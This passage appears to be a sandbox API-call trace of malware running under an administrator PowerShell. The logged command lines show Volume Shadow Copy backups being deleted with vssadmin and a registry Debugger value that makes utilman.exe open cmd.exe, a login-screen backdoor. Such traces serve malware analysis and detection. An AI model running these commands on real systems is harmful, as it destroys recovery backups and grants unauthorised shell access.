[0238.491] lstrlenW (lpString="/Quiet") returned 6 [0238.491] CoTaskMemAlloc (cb=0x10) returned 0x1b9cc850 [0238.491] RtlMoveMemory (in: Destination=0x1b9cc850, Source=0x1b9a5ffa, Length=0xe | out: Destination=0x1b9cc850) [0238.492] CoTaskMemFree (pv=0x1b9cc850) [0238.492] LocalFree (hMem=0x1b9a5fa0) returned 0x0 [0238.492] CoTaskMemAlloc (cb=0x804) returned 0x1b9d91a0 [0238.492] GetConsoleTitleW (in: lpConsoleTitle=0x1b9d91a0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0238.492] CoTaskMemFree (pv=0x1b9d91a0) [0238.493] CoTaskMemAlloc (cb=0x88) returned 0x213350 [0238.493] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\vssadmin.exe\" Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c94dfc0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3068558 | out: lpCommandLine="\"C:\\Windows\\system32\\vssadmin.exe\" Delete Shadows /All /Quiet", lpProcessInformation=0x3068558*(hProcess=0x3cc, hThread=0x3c8, dwProcessId=0xa00, dwThreadId=0x9d0)) returned 1 [0238.499] CoTaskMemFree (pv=0x213350) [0238.499] CloseHandle (hObject=0x3c8) returned 1 [0238.499] CoTaskMemAlloc (cb=0x22) returned 0x1b9b1010 [0238.499] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\vssadmin.exe", dwFileAttributes=0x0, psfi=0x1c94e068, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c94e068) returned 0x4550 [0238.500] CoTaskMemFree (pv=0x1b9b1010) [0238.500] GetCurrentProcess () returned 0xffffffffffffffff [0238.500] GetCurrentProcess () returned 0xffffffffffffffff [0238.500] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3cc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c94e148, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c94e148*=0x3c8) returned 1 [0239.142] CloseHandle (hObject=0x3c8) returned 1 [0239.142] GetExitCodeProcess (in: hProcess=0x3cc, lpExitCode=0x1c94e1b8 | out: lpExitCode=0x1c94e1b8*=0x1) returned 1 [0239.142] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0239.144] CloseHandle (hObject=0x3cc) returned 1 [0239.144] SetEvent (hEvent=0x398) returned 1 [0239.145] SetEvent (hEvent=0x2f0) returned 1 [0239.145] SetEvent (hEvent=0x390) returned 1 [0239.145] SetEvent (hEvent=0x394) returned 1 [0239.145] SetEvent (hEvent=0x380) returned 1 [0239.145] SetEvent (hEvent=0x370) returned 1 [0239.145] SetEvent (hEvent=0x39c) returned 1 [0239.145] SetEvent (hEvent=0x3bc) returned 1 [0239.145] SetEvent (hEvent=0x3a4) returned 1 [0239.146] CoUninitialize () Thread: id = 120 os_tid = 0x388 [0239.174] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0239.176] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0239.177] VirtualQuery (in: lpAddress=0x1c86d7e0, lpBuffer=0x1c86e6a0, dwLength=0x30 | out: lpBuffer=0x1c86e6a0*(BaseAddress=0x1c86d000, AllocationBase=0x1bee0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0239.178] VirtualQuery (in: lpAddress=0x1c86da90, lpBuffer=0x1c86e950, dwLength=0x30 | out: lpBuffer=0x1c86e950*(BaseAddress=0x1c86d000, AllocationBase=0x1bee0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0239.181] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0239.181] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0239.181] CoTaskMemFree (pv=0x2af7b0) [0239.181] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0239.181] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0239.181] CoTaskMemFree (pv=0x2af7b0) [0239.182] CoTaskMemAlloc (cb=0x20e) returned 0x2bbbb0 [0239.182] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2bbbb0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0239.182] CoTaskMemFree (pv=0x2bbbb0) [0239.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c86d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0239.182] SetErrorMode (uMode=0x1) returned 0x1 [0239.183] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\REG.ps1", lpFindFileData=0x1c86d9c0 | out: lpFindFileData=0x1c86d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0239.183] SetErrorMode (uMode=0x1) returned 0x1 [0239.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c86d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0239.183] SetErrorMode (uMode=0x1) returned 0x1 [0239.183] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\REG.psm1", lpFindFileData=0x1c86d9c0 | out: lpFindFileData=0x1c86d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0239.184] SetErrorMode (uMode=0x1) returned 0x1 [0239.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c86d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0239.184] SetErrorMode (uMode=0x1) returned 0x1 [0239.184] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\REG.psd1", lpFindFileData=0x1c86d9c0 | out: lpFindFileData=0x1c86d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0239.184] SetErrorMode (uMode=0x1) returned 0x1 [0239.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c86d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0239.185] SetErrorMode (uMode=0x1) returned 0x1 [0239.185] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\REG.COM", lpFindFileData=0x1c86d9c0 | out: lpFindFileData=0x1c86d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0239.185] SetErrorMode (uMode=0x1) returned 0x1 [0239.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c86d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0239.185] SetErrorMode (uMode=0x1) returned 0x1 [0239.185] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\REG.EXE", lpFindFileData=0x1c86d9c0 | out: lpFindFileData=0x1c86d9c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x502c3bef, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0x502c3bef, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0xedd81bd0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x12400, dwReserved0=0x0, dwReserved1=0x0, cFileName="reg.exe", cAlternateFileName="")) returned 0x1feb60 [0239.185] FindNextFileW (in: hFindFile=0x1feb60, lpFindFileData=0x1c86d9d0 | out: lpFindFileData=0x1c86d9d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x502c3bef, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0x502c3bef, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0xedd81bd0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x12400, dwReserved0=0x0, dwReserved1=0x0, cFileName="reg.exe", cAlternateFileName="")) returned 0 [0239.186] FindClose (in: hFindFile=0x1feb60 | out: hFindFile=0x1feb60) returned 1 [0239.186] SetErrorMode (uMode=0x1) returned 0x1 [0239.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\reg.exe", nBufferLength=0x105, lpBuffer=0x1c86dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\reg.exe", lpFilePart=0x0) returned 0x1b [0239.186] SetErrorMode (uMode=0x1) returned 0x1 [0239.186] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\reg.exe" (normalized: "c:\\windows\\system32\\reg.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c86dcf0 | out: lpFileInformation=0x1c86dcf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x502c3bef, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0x502c3bef, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0xedd81bd0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x12400)) returned 1 [0239.222] SetErrorMode (uMode=0x1) returned 0x1 [0239.222] CoTaskMemAlloc (cb=0x1d) returned 0x1b9b1010 [0239.222] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\reg.exe", dwFileAttributes=0x0, psfi=0x1c86ded8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c86ded8) returned 0x4550 [0239.255] CoTaskMemFree (pv=0x1b9b1010) [0239.255] GetConsoleWindow () returned 0x5011e [0239.255] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0239.255] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0239.256] CoTaskMemFree (pv=0x2af7b0) [0239.256] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0239.256] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0239.256] CoTaskMemFree (pv=0x2af7b0) [0239.256] CommandLineToArgvW (in: lpCmdLine=" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\" /f /v Debugger /t REG_SZ /d %windir%\\system32\\cmd.exe", pNumArgs=0x1c86df20 | out: pNumArgs=0x1c86df20) returned 0x1b9ca640*="" [0239.256] lstrlenW (lpString="ADD") returned 3 [0239.256] CoTaskMemAlloc (cb=0xa) returned 0x1b9cc790 [0239.256] RtlMoveMemory (in: Destination=0x1b9cc790, Source=0x1b9ca69a, Length=0x8 | out: Destination=0x1b9cc790) [0239.256] CoTaskMemFree (pv=0x1b9cc790) [0239.256] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe") returned 90 [0239.256] CoTaskMemAlloc (cb=0xb8) returned 0x29a040 [0239.256] RtlMoveMemory (in: Destination=0x29a040, Source=0x1b9ca6a2, Length=0xb6 | out: Destination=0x29a040) [0239.256] CoTaskMemFree (pv=0x29a040) [0239.256] lstrlenW (lpString="/f") returned 2 [0239.257] CoTaskMemAlloc (cb=0x8) returned 0x1b9c9070 [0239.257] RtlMoveMemory (in: Destination=0x1b9c9070, Source=0x1b9ca758, Length=0x6 | out: Destination=0x1b9c9070) [0239.257] CoTaskMemFree (pv=0x1b9c9070) [0239.257] lstrlenW (lpString="/v") returned 2 [0239.257] CoTaskMemAlloc (cb=0x8) returned 0x1b9c9070 [0239.257] RtlMoveMemory (in: Destination=0x1b9c9070, Source=0x1b9ca75e, Length=0x6 | out: Destination=0x1b9c9070) [0239.257] CoTaskMemFree (pv=0x1b9c9070) [0239.257] lstrlenW (lpString="Debugger") returned 8 [0239.257] CoTaskMemAlloc (cb=0x14) returned 0x1b9cc790 [0239.257] RtlMoveMemory (in: Destination=0x1b9cc790, Source=0x1b9ca764, Length=0x12 | out: Destination=0x1b9cc790) [0239.257] CoTaskMemFree (pv=0x1b9cc790) [0239.257] lstrlenW (lpString="/t") returned 2 [0239.257] CoTaskMemAlloc (cb=0x8) returned 0x1b9c9070 [0239.257] RtlMoveMemory (in: Destination=0x1b9c9070, Source=0x1b9ca776, Length=0x6 | out: Destination=0x1b9c9070) [0239.257] CoTaskMemFree (pv=0x1b9c9070) [0239.257] lstrlenW (lpString="REG_SZ") returned 6 [0239.257] CoTaskMemAlloc (cb=0x10) returned 0x1b9cc790 [0239.257] RtlMoveMemory (in: Destination=0x1b9cc790, Source=0x1b9ca77c, Length=0xe | out: Destination=0x1b9cc790) [0239.257] CoTaskMemFree (pv=0x1b9cc790) [0239.257] lstrlenW (lpString="/d") returned 2 [0239.257] CoTaskMemAlloc (cb=0x8) returned 0x1b9c9070 [0239.257] RtlMoveMemory (in: Destination=0x1b9c9070, Source=0x1b9ca78a, Length=0x6 | out: Destination=0x1b9c9070) [0239.257] CoTaskMemFree (pv=0x1b9c9070) [0239.257] lstrlenW (lpString="%windir%\\system32\\cmd.exe") returned 25 [0239.257] CoTaskMemAlloc (cb=0x36) returned 0x1b9c7170 [0239.258] RtlMoveMemory (in: Destination=0x1b9c7170, Source=0x1b9ca790, Length=0x34 | out: Destination=0x1b9c7170) [0239.258] CoTaskMemFree (pv=0x1b9c7170) [0239.258] LocalFree (hMem=0x1b9ca640) returned 0x0 [0239.258] CoTaskMemAlloc (cb=0x804) returned 0x1b9d9c50 [0239.258] GetConsoleTitleW (in: lpConsoleTitle=0x1b9d9c50, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0239.258] CoTaskMemFree (pv=0x1b9d9c50) [0239.259] CoTaskMemAlloc (cb=0x16e) returned 0x228340 [0239.259] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\reg.exe\" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\" /f /v Debugger /t REG_SZ /d %windir%\\system32\\cmd.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c86de80*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30814a0 | out: lpCommandLine="\"C:\\Windows\\system32\\reg.exe\" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\" /f /v Debugger /t REG_SZ /d %windir%\\system32\\cmd.exe", lpProcessInformation=0x30814a0*(hProcess=0x41c, hThread=0x418, dwProcessId=0x150, dwThreadId=0xb04)) returned 1 [0239.272] CoTaskMemFree (pv=0x228340) [0239.272] CloseHandle (hObject=0x418) returned 1 [0239.272] CoTaskMemAlloc (cb=0x1d) returned 0x1b9b1010 [0239.272] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\reg.exe", dwFileAttributes=0x0, psfi=0x1c86df28, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c86df28) returned 0x4550 [0239.273] CoTaskMemFree (pv=0x1b9b1010) [0239.273] GetCurrentProcess () returned 0xffffffffffffffff [0239.273] GetCurrentProcess () returned 0xffffffffffffffff [0239.273] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x41c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c86e008, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c86e008*=0x418) returned 1 [0240.035] CloseHandle (hObject=0x418) returned 1 [0240.035] GetExitCodeProcess (in: hProcess=0x41c, lpExitCode=0x1c86e078 | out: lpExitCode=0x1c86e078*=0x0) returned 1 [0240.035] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0240.037] CloseHandle (hObject=0x41c) returned 1 [0240.038] SetEvent (hEvent=0x3e4) returned 1 [0240.038] SetEvent (hEvent=0x3d8) returned 1 [0240.038] SetEvent (hEvent=0x3dc) returned 1 [0240.038] SetEvent (hEvent=0x3e0) returned 1 [0240.038] SetEvent (hEvent=0x3f4) returned 1 [0240.038] SetEvent (hEvent=0x3e8) returned 1 [0240.038] SetEvent (hEvent=0x3ec) returned 1 [0240.038] SetEvent (hEvent=0x3f0) returned 1 [0240.038] SetEvent (hEvent=0x3f8) returned 1 [0240.038] CoUninitialize () Thread: id = 122 os_tid = 0xa10 [0240.068] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0240.070] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0240.071] VirtualQuery (in: lpAddress=0x1c98db40, lpBuffer=0x1c98ea00, dwLength=0x30 | out: lpBuffer=0x1c98ea00*(BaseAddress=0x1c98d000, AllocationBase=0x1c000000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x1000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0240.073] VirtualQuery (in: lpAddress=0x1c98ddf0, lpBuffer=0x1c98ecb0, dwLength=0x30 | out: lpBuffer=0x1c98ecb0*(BaseAddress=0x1c98d000, AllocationBase=0x1c000000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0240.075] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0240.075] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0240.075] CoTaskMemFree (pv=0x2af7b0) [0240.075] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0240.076] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0240.076] CoTaskMemFree (pv=0x2af7b0) [0240.076] CoTaskMemAlloc (cb=0x20e) returned 0x2bb980 [0240.076] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2bb980 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0240.076] CoTaskMemFree (pv=0x2bb980) [0240.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0240.077] SetErrorMode (uMode=0x1) returned 0x1 [0240.077] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\REG.ps1", lpFindFileData=0x1c98dd20 | out: lpFindFileData=0x1c98dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.077] SetErrorMode (uMode=0x1) returned 0x1 [0240.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0240.077] SetErrorMode (uMode=0x1) returned 0x1 [0240.078] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\REG.psm1", lpFindFileData=0x1c98dd20 | out: lpFindFileData=0x1c98dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.078] SetErrorMode (uMode=0x1) returned 0x1 [0240.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0240.078] SetErrorMode (uMode=0x1) returned 0x1 [0240.078] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\REG.psd1", lpFindFileData=0x1c98dd20 | out: lpFindFileData=0x1c98dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.078] SetErrorMode (uMode=0x1) returned 0x1 [0240.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0240.079] SetErrorMode (uMode=0x1) returned 0x1 [0240.079] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\REG.COM", lpFindFileData=0x1c98dd20 | out: lpFindFileData=0x1c98dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0240.079] SetErrorMode (uMode=0x1) returned 0x1 [0240.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c98db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0240.079] SetErrorMode (uMode=0x1) returned 0x1 [0240.080] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\REG.EXE", lpFindFileData=0x1c98dd20 | out: lpFindFileData=0x1c98dd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x502c3bef, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0x502c3bef, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0xedd81bd0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x12400, dwReserved0=0x0, dwReserved1=0x0, cFileName="reg.exe", cAlternateFileName="")) returned 0x1feb60 [0240.080] FindNextFileW (in: hFindFile=0x1feb60, lpFindFileData=0x1c98dd30 | out: lpFindFileData=0x1c98dd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x502c3bef, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0x502c3bef, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0xedd81bd0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x12400, dwReserved0=0x0, dwReserved1=0x0, cFileName="reg.exe", cAlternateFileName="")) returned 0 [0240.080] FindClose (in: hFindFile=0x1feb60 | out: hFindFile=0x1feb60) returned 1 [0240.080] SetErrorMode (uMode=0x1) returned 0x1 [0240.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\reg.exe", nBufferLength=0x105, lpBuffer=0x1c98de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\reg.exe", lpFilePart=0x0) returned 0x1b [0240.081] SetErrorMode (uMode=0x1) returned 0x1 [0240.081] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\reg.exe" (normalized: "c:\\windows\\system32\\reg.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c98e050 | out: lpFileInformation=0x1c98e050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x502c3bef, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0x502c3bef, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0xedd81bd0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x12400)) returned 1 [0240.081] SetErrorMode (uMode=0x1) returned 0x1 [0240.081] CoTaskMemAlloc (cb=0x1d) returned 0x1b9b1010 [0240.082] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\reg.exe", dwFileAttributes=0x0, psfi=0x1c98e238, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c98e238) returned 0x4550 [0240.082] CoTaskMemFree (pv=0x1b9b1010) [0240.082] GetConsoleWindow () returned 0x5011e [0240.083] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0240.083] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0240.083] CoTaskMemFree (pv=0x2af7b0) [0240.083] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0240.083] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | 